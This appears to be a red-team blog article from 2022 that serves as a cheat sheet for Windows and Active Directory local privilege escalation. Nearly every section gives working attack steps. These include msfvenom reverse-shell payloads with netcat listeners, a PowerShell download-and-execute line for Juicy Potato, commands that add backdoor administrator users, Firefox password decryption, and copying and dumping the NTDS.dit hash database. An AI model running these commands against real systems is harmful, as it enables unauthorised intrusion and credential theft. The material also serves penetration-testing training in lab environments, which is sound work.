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+title : "Active Directory - Local Privilege Escalation"
+author: Bhaskar Pal
+date: 2022-04-01 09:26:00 +0800
+categories: [Red-Teaming, Active-Directory-Local-Privilege-Escalation]
+tags: [active-directory-local-privilege-escalation,windows-local-privilege-escalation]
+# Introduction
+Welcome to my third article in the Red Teaming Series (Active Directory Local Privilege Escalation). I hope everyone has gone through the first two articles of this series which go through the basic concepts required to understand Active Directory and high-level Domain enumeration explanation.
+If not so, you can give it a read from [here](https://0xstarlight.github.io/categories/red-teaming/).
+This guide aims to explain Windows/Active-Directory Local Privilege escalation snippets mainly by abusing services, registries, tokens and groups etc., in detail. I will also explain those terms that every pentester/red-teamer should control to understand the attacks performed in an Active Directory network. You may refer to this as a Cheat-Sheet also.
+I will continue to update this article with new privilege escalation vectors.
+> Throughout the article, I will use [PowerView](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1), [winPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS), [AccessChk](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) and [PowerUp](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1) in performing local privilege escalation on an Windows/Active Directory Environment. If any other tools are required, they will be mentioned along.
+# What is Privilege Escalation
+Privilege escalation exploits a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are generally protected from an application or user.
+Now that you know the meaning of privilege escalation, we can dive right into the techniques for escalation.
+# Autorun
+## Methodology
+Autorun is a type of Registry Escalation.
+To ensure that the IT department creates a secure environment, Windows administrators often need to know what kind of access specific users or groups have to resources, including files, directories, Registry keys, global objects, and Windows services. AccessChk quickly answers these questions with an intuitive interface and output.
+So basically, we can say a particular application in a specific directory gets automatically executed with administrator privileges once he logs on. This can be abused by finding the path location and dropping our malicious executable file through which we will gain administrator access.
+## Detection
+### Using Autoruns and AccessChk
+1. Transfer [Autoruns64.exe](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns) on the Windows/AD machine and execute it on cmd
+C:\Temp> Autoruns64.exe
+2. In Autoruns, click on the `"Logon"` tab.
+3. From the listed results, notice that the `"My Program"` entry is pointing to `"C:\Program Files\Autorun Program\program.exe"`.
+4. Go back to the command prompt run [AccessChk64.exe](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk)
+C:\Temp> accesschk64.exe -wvu "C:\Program Files\Autorun Program"
+# Switch meaning
+# w --> only show items that have write access
+# v --> verbose; dispaly as many details as possible
+# u --> ignore the errors
+### Using PowerUp
+1. Run [PowerUp](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1) and Run `Invoke-AllChecks` (check the autoruns field)
+C:\Temp> powershell -ep bypass
+PS C:\Temp>. .\PowerUp.sp1
+PS C:\Temp> Invoke-AllChecks
+From the output, notice that the `"Everyone"` user group has `"FILE_ALL_ACCESS"` permission on the `"program.exe"` file. To gain administrator access, we can drop our malicious executable file by overwriting on the file.
+## Exploitation
+### Kali VM
+1. Start a netcat listener
+$ sudo nc -nvlp 53
+2. Open an additional command prompt and type:
+$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o program.exe
+3. Transfer the generated file, `program.exe`, to the Windows VM.
+### Windows VM
+1. replace `program.exe` in `'C:\Program Files\Autorun Program'`
+### Kali VM
+1. Wait for a reverse shell on your kali machine.
+# AlwaysInstallElevated
+## Methodology
+AlwaysInstallElevated is a type of Registry Escalation.
+This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting.
+To install a package with elevated (system) privileges, set the AlwaysInstallElevated value to "1" under both of the following registry keys:
+If the AlwaysInstallElevated value is not set to "1" under both of the preceding registry keys, the installer uses elevated privileges to install managed applications and uses the current user's privilege level for unmanaged applications.
+## Detection
+### Windows VM
+1. Open command prompt and type:
+C:\Temp> reg query HKLM\Software\Policies\Microsoft\Windows\Installer
++ `0x1` means its ON
+2. In command prompt type:
+C:\Temp>reg query HKCU\Software\Policies\Microsoft\Windows\Installer
++ `0x1` means its ON
+From the both output, we notice that `“AlwaysInstallElevated”` value is `1`. Hence, we can abuse this function to get privilege escalation.
+### Using PowerUp
+1. Run Powerup.ps1 and Run `Invoke-AllChecks` (check the AlwaysInstallElevated field)
+C:\Temp> powershell -ep bypass
+PS C:\Temp>. .\PowerUp.sp1
+PS C:\Temp> Invoke-AllChecks
+2. Run `Write-UserAddMSI` and Add backdoor user in *Administrators* group (Required RDP access)
+3. Check local Administrators
+C:\Temp> net localgroup administrators
+# now backdoor is added to the localgroup administrators group
+## Exploitation
+### Kali VM
+1. Start a netcat listener
+$ sudo nc -nvlp 53
+2. Open an additional command prompt and type:
+$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f msi -o setup.msi
+3. Copy the generated file, `setup.msi`, to the Windows VM.
+### Windows VM
+1. Place `'setup.msi'` in `'C:\Temp'`
+2. Open command prompt and type:
+C:\Temp> msiexec /quiet /qn /i C:\Temp\setup.msi
+### Kali VM
+1. Wait for a reverse shell on your kali machine.
+# Service Registry
+## Methodology
+A service registry consists of a cluster of servers that use a replication protocol to maintain consistency. Hence if we get Full Contol permission over the registry key, we can drop our malicious executable file to gain administrator access.
+## Detection
+### Windows VM
+1. Open powershell prompt and type:
+C:\Temp> powershell -ep bypass
+PS C:\Temp> Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
+2. Notice that the output suggests that user belong to `"NT AUTHORITY\INTERACTIVE"` has `"FullContol"` permission over the registry key.
+## Exploitation
+### Kali VM
+1. Start a netcat listener
+$ sudo nc -nvlp 53
+2. Open an additional command prompt and type:
+$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o x.exe
+3. Copy the generated file `x.exe`, to the Windows VM.
+### Windows VM
+1. Place `x.exe` in `'C:\Temp'`
+2. Open command prompt at type:
+C:\Temp> reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
+3. In the command prompt type:
+C:\Temp> sc start regsvc
+# If it doesnt work try restaring the service and perform the exploit egain
+### Kali VM
+1. Wait for a reverse shell on your kali machine.
+# Executable Files
+## Methodology
+Microsoft Windows services, formerly known as NT services, enable you to create long-running executable applications that run in their own Windows sessions. These services can be automatically started when the computer boots, can be paused and restarted, and do not show any user interface.
+Hence if we get Full Contol permission over the file path location, we can drop our malicious executable file to gain administrator access.
+## Detection
+1. Run Powerup.ps1 and Run `Invoke-AllChecks` (check the service executable field)
+C:\Temp> powershell -ep bypass
+PS C:\Temp>. .\PowerUp.sp1
+PS C:\Temp> Invoke-AllChecks
+We can see that we have Modifiable File access to `"c:\Program Files\File Permissions Service\filepermservice.exe"`. To gain administrator access, we can drop our malicious executable file on this location.
+## Exploitation
+### Kali VM
+1. Start a netcat listener
+$ sudo nc -nvlp 53
+2. Open an additional command prompt and type:
+$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o x.exe
+3. Copy the generated file `x.exe`, to the Windows VM and replace it over `filepermsvc.exe`.
+### Windows VM
+1. In command prompt type:
+C:\Temp> sc start filepermsvc
+### Kali VM
+1. Wait for a reverse shell on your kali machine.
+# Startup Applications
+## Methodology
+Startup apps run in the background, the number of apps running on the system can be significantly more than what the user is aware of and affect system responsiveness. Startup apps are classified to include those leveraging these mechanisms to start:
++ Run registry keys (HKLM, HKCU, wow64 nodes included)
++ RunOnce registry keys
++ Startup folders under the start menu for per user and public locations
+So basically, we need full access to the Startup folder. Then by dropping our malicious executable file, we will gain administrator access.
+## Detection
+### Windows VM
+1. Open command prompt and type:
+C:\Temp> icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
+2. From the output notice that the `"BUILTIN\Users"` group has full access `'(F)'` to the directory.
+## Exploitation
+### Kali VM
+1. Start a netcat listener
+$ sudo nc -nvlp 53
+2. Open an additional command prompt and type:
+$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o y.exe
+3. Copy the generated file, `y.exe`, to the Windows VM.
+### Windows VM
+1. Place `y.exe` in `"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"`.
+### Kali VM
+1. Wait for a reverse shell on your kali machine.
+# DLL Hijacking
+## Methodology
+Windows applications usually load DLL files when started. It may happen that a DLL file does not exist and the application is unable to load it. Nevertheless, an application will continue to execute as long as the missing DLL is not needed.
+In case the application uses a relative and not an absolute file path, Windows searches for the file in the following directories:
+- The directory from which the application is loaded
+- `C:\Windows\System32`
+- `C:\Windows\System`
+- `C:\Windows`
+- The current working directory
+- Directories in the system PATH environment variable
+- Directories in the user PATH environment variable
+### Steps taken to perform DLL hijacking are outlined below.
+1. Identify vulnerable application and location
+2. Identify applications PID
+3. Identify vulnerable DLLs that can be hijacked
+4. Use MSFVenom or other payload creation tools to create a malicious DLL
+5. Replace the original DLL with the malicious DLL
+6. Profit
+## Detection
+### Windows VM (RDP is required)
+1. Transfer [Procmon.exe](https://strontic.github.io/xcyclopedia/library/Procmon.exe-EB2A0D7AC44B9B66E884EE5087305ACC.html) on the Windows VM
+2. Right click on `Procmon.exe` and select `'Run as administrator'` from the menu.
+3. In procmon, select `"filter"`. From the left-most drop down menu, select `'Process Name'`.
+4. In the input box on the same line type: `dllhijackservice.exe`
+5. Make sure the line reads “Process Name is `dllhijackservice.exe` then Include” and click on the `'Add'` button, then `'Apply'` and lastly on 'OK'.
+6. Next, select from the left-most drop down menu `'Result'`.
+7. In the input box on the same line type: `NAME NOT FOUND`.
+8. Make sure the line reads “Result is NAME NOT FOUND then Include” and click on the `'Add'` button, then `'Apply'` and lastly on 'OK'.
+9. Open command prompt and type:
+C:\Temp> sc start dllsvc
+10. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute `'C:\Temp\hijackme.dll'` yet it could not do that as the file was not found. Note that `'C:\Temp'` is a writable location.
+## Exploitation
+### Kali VM
+1. Start a netcat listener
+$ sudo nc -nvlp 53
+2. Open an additional command prompt and type:
+$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f dll -o hijackme.dll
+3. Copy the generated file `hijackme.dll`, to the Windows VM.
+### Windows VM
+1. Place `hijackme.dll` in` 'C:\Temp'`
+2. Open command prompt and type:
+C:\Temp> sc stop dllsvc & sc start dllsvc
+### Kali VM
+1. Wait for a reverse shell on your kali machine.
+# BinPath
+## Methodology
+BinPath is a type of Service Escalation. We can gain administrator privileges if we write access and restart access on any service. We can abuse this function by injecting our malicious BinPath to get executed once restarted.
+## Detection
+### Using Script on Windows VM
+1. Run Powerup.ps1 and Run `Invoke-AllChecks` (check the service permissions field)
+C:\Temp> powershell -ep bypass
+PS C:\Temp>. .\PowerUp.sp1
+PS C:\Temp> Invoke-AllChecks
+### Checking manually on Windows VM
+1. Run [AccessChk64.exe](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk)
+C:\Temp> accesschk64.exe -uwcv Everyone *
+# Switch meaning
+# w --> only show items that have write access
+# v --> verbose; dispaly as many details as possible
+# u --> ignore the errors
+# c --> displays service name of the following
+# Everyone --> means everyone as a group who hass access
+2. Using [AccessChk64.exe](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) query the service found
+C:\Temp> accesschk64.exe -uwcv daclsvc
+3. Find path of the bin file
+C:\Temp> sc qc daclsvc
+## Exploitation
+### Kali VM
+1. Start a netcat listener
+$ sudo nc -nvlp 53
+2. Open an additional command prompt and type:
+$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o reverse.exe
+3. Copy the generated file `reverse.exe`, to the Windows VM.
+### Windows VM
+1. Place `reverse.exe` in` 'C:\Temp'`
+2. In command prompt type:
+C:\Temp> sc config daclsvc binpath= "C:\Temp\reverse.exe"
+3. In command prompt type:
+C:\Temp> sc start daclsvc
+### Kali VM
+1. Wait for a reverse shell on your kali machine.
+# Unquoted Service Paths
+## Methodology
+When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege).
+In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument.
+## Detection
+1. Run Powerup.ps1 and Run `Invoke-AllChecks` (check the unquoted service field)
+C:\Temp> powershell -ep bypass
+PS C:\Temp>. .\PowerUp.sp1
+PS C:\Temp> Invoke-AllChecks
+## Exploitation
+### Kali VM
+1. Start a netcat listener
+$ sudo nc -nvlp 53
+2. Open an additional command prompt and type:
+$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o common.exe
+3. Transfer the generated file, `common.exe`, to the Windows VM.
+### Windows VM
+1. Place `common.exe` in `'C:\Program Files\Unquoted Path Service'`.
+2. Open command prompt and type:
+C:\Temp> sc start unquotedsvc
+# OR
+C:\Temp> net start unquotedsvc
+### Kali VM
+1. Wait for a reverse shell on your kali machine.
+# Juicy potato attack
+## Methodology
+This privilege allows us to impersonate a token of a privileged account such as NT AUTHORITY\SYSTEM.
+## Detection
+### Windows VM
+1. We should have `SeImpersonatePrivilege` privileges enabled
+C:\Temp>whoami /priv
+## Exploitation
+### Kali VM
+1. Copy `Invoke-PowerShellTcp.ps1` from [nishang](https://github.com/samratashok/nishang/tree/master/Shells) shells as `shell.ps1`
+2. Add the line at the bottom of `shell.ps1`
+Invoke-PowerShellTcp -Reverse -IPAddress -Port 9999
+3. Lets create a `shell.bat` file
+powershell -c iex(new-object net.webclient).downloadstring('')
+4. Transfer `shell.bat` and `juicypotato.exe` on victim machine
+$ (new-object net.webclient).downloadfile('', 'C:\temp\file')
+5. Set a listener on port 9999
+$ sudo rlwrap nc -lnvp 9999
+### Windows VM
+1. Run juicy potato
+$ ./jp.exe -p shell.bat -l 7777 -t *
++ If this fail
++ Try with a different CLSID depending upon the system version and select the CLSID which supports NT AUTHORITY\SYSTEM
++ Link --> [http://ohpe.it/juicy-potato/CLSID](http://ohpe.it/juicy-potato/CLSID)
+2. Lets run again
+$ ./jp.exe -p shell.bat -l 7777 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"
+### Kali VM
+1. Wait for a reverse shell on your kali machine.
+# Hot Potato attack
+## Methodology
+Hot Potato takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
+## Detection
+### Windows VM
+1. We should have `SeImpersonatePrivilege` privileges enabled
+C:\Temp> whoami /priv
+## Exploitation
+I will be demonstrating a simple exploitation technique by adding a user to the local administrators group using [Tater.ps1](https://github.com/Kevin-Robertson/Tater/blob/master/Tater.ps1)
+### Windows VM
+1. Enter the following to gain administrator access
+C:\Temp> powershell.exe -nop -ep bypass
+PS C:\Temp> Import-Module C:\Temp\Tater.ps1
+PS C:\Temp> Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
+# Kernel Exploits
+## Searcing exploits
+This method is handy for checking any existing exploits available for the machine by looking at the system information.
+From the results of [windows-exploit-suggester.py](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py) we can select one of the kernel exploits and try to escalate privileges.
+### Windows VM
+1. Run systeminfo and save it into a text file
+C:\Temp> systeminfo
+### Kali VM
+1. Pass the file thorugh [windows-exploit-suggester.py](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py)
+$ ./windows-exploit-suggester.py --update
+[*] initiating...
+[*] successfully requested base url
+[*] scraped ms download url
+[+] writing to file 2020-06-06-mssb.xlsx
+[*] done
+$ ./windows-exploit-suggester.py --database 2020-06-06-mssb.xlsx --systeminfo systeminfo.txt
+Exploits will be displayed here...
+# Password Mining Escalation - Firefox
+## Detection
+1. winpeas
+2. Path location :
+C:\Temp> C:\Users\usernamehere\AppData\Roaming\Mozilla\Firefox\Profiles
+## Requirements
+Copy the following files from the Windows VM to Kali VM:
+1. key4.db
+2. logins.json
+3. addons.json
+4. cert9.db
+## Exploitation
+1. Download the following
+$ git clone https://github.com/lclevy/firepwd.git
+2. Place the required files in the same directory and run the python file for the creds
+$ python3 firepwd.py
+globalSalt: b'2d45b7ac4e42209a23235ecf825c018e0382291d'
+clearText b'86a15457f119f862f8296e4f2f6b97d9b6b6e9cb7a3204760808080808080808'
+decrypting login/password pairs
+ https://creds.com:b'mayor',b'<>'
+# Runas-Savdcreds
+## Methodology
+We can check if there are any pre-existing credentials of the administrator on the system. We can abuse this by using the loaded creds for privilege escalation. In the below example, I will demonstrate how to read files through the saved creds.
+## Detection
+1. winpeas
+2. Checking for existence
+$ cmdkey /list
+Currently stored credentials:
+ Target: Domain:interactive=WORKGROUP\Administrator
+ Type: Domain Password
+ User: WORKGROUP\Administrator
+## Exploitation
+1. Reading root flag
+C:\Temp> C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE c:\Users\Administrator\Desktop\root.txt > C:\Users\security\root1.txt"
+# Backup Operators (Disk shadow + Robocopy)
+## Methodology
+If the user is a part of the Backup Operator group, the user has the ability to create system backups and could be used to obtain copies of sensitive system files that can be used to retrieve passwords such as the SAM and SYSTEM Registry hives and the NTDS.dit Active Directory database file.
+## Detection
+1. The user should be a part of the Backup Operators group and should have SeBackupPrivilege and SeRestorePrivilege Enabled
+C:\Temp> net user unsername-here
+C:\Temp> whoami /all
+## Exploitation
+### Kali VM
+1. Create this script and transfer it to Windows VM
+set verbose onX
+set metadata C:\Windows\Temp\meta.cabX
+set context clientaccessibleX
+set context persistentX
+begin backupX
+add volume C: alias cdriveX
+expose %cdrive% E:X
+end backupX
+### Windows VM
+1. Pass the script to **diskshadow unility** to create the shadow copy
+PS C:\Temp> diskshadow /s script.txt
+2. Now copy the NTDS file using **_Robocopy_** to the Temp file we created in the C: drive
+PS C:\Temp> robocopy /b E:\Windows\ntds . ntds.dit
+3. Next we get the system registry hive that contains the key needed to decrypt the NTDS file with **_reg save_** command.
+PS C:\Temp> reg save hklm\system c:\temp\system.hive
+### Dumping NTML Hashes
+1. We can use `secretsdump.py` do decrypt the DA creds on Kali VM
+$ secretsdump.py -ntds ntds.dit -system system.hive LOCAL | tee hash-dump
+# Abusing GPO permissions
+## Exploitation
+We Abusing GPO by adding the user to the local Administrators group leveraging a tool called SharpGPOAbuse.
+Source : [https://github.com/FSecureLABS/SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse)
+Pre compiled binaries : [https://github.com/Flangvik/SharpCollection](https://github.com/Flangvik/SharpCollection)
++ Add user to local administrator groups
+PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
+[+] Domain = vulnnet.local
+[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
+[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
+[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
+[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
+[+] versionNumber attribute changed successfully
+[+] The version number in GPT.ini was increased successfully.
+[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
+[+] Done!
++ Force Update the system
+PS C:\Enterprise-Share> gpupdate /force
+Updating policy...
+Computer Policy update has completed successfully.
+User Policy update has completed successfully.
++ Now review our group memberships after we forced the policies to be updated on the target machine.
+PS C:\Enterprise-Share> net user enterprise-security
+# Will be added to the administrators group
+# Export LAPS Passwords
+## Methodology
+The following script assumes that LAPS has already been configured into your environment & that your user account already has access to view LAPS passwords using the Fat Client UI or from Active Directory Users & Computers.
+This script loads the Active Directory module, finds the LAPS password fields, and then saves them to a CSV with the date appended to the file name. The only thing you’d need to change is the file path.
+## Exploitation
+1. Just Open Powershell and paste this script
+$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
+$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
+$computers | Export-Csv -path c:\temp\"LAPS-$((Get-Date).ToString("MM-dd-yyyy")).csv" -NoTypeInformation
+2. Then, save it to the location of your choice. For this example, I’m saving to
+3. Then, run the script to verify it works correctly. If it does, you should automate this procedure by creating a Scheduled Task.
+# References
+1. [https://tryhackme.com/room/windowsprivescarena](https://tryhackme.com/room/windowsprivescarena)
+2. [https://docs.microsoft.com/en-us/](https://docs.microsoft.com/en-us/)
+If you find my articles interesting, you can buy me a coffee